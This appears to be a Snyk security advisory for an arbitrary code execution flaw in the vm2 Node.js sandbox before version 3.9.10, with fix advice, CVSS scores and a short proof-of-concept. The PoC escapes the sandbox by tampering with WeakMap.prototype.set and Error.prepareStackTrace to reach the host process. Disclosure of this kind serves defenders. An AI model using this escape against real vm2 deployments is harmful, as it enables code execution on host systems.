Arbitrary Code Execution Affecting vm2 package, versions <3.9.10


Severity

Recommended
0.0
critical
0
10

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.19% (58th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-VM2-2990237
  • published 20 Dec 2022
  • disclosed 24 Aug 2022
  • credit Ghaem Arasteh

How to fix?

Upgrade vm2 to version 3.9.10 or higher.

Overview

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.

PoC

const { VM } = require('vm2');
new VM().run(`
const { set } = WeakMap.prototype;
WeakMap.prototype.set = function(v) {
return set.call(this, v, v);
};
Error.prepareStackTrace =
Error.prepareStackTrace =
(_, c) => c.map(c => c.getThis()).find(a => a);
const { stack } = new Error();
Error.prepareStackTrace = undefined;
stack.process.exit(1);
`);

// Never gets executed.
console.log('Finished');

CVSS Scores

version 3.1
Expand this section

Snyk

9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

9.8 critical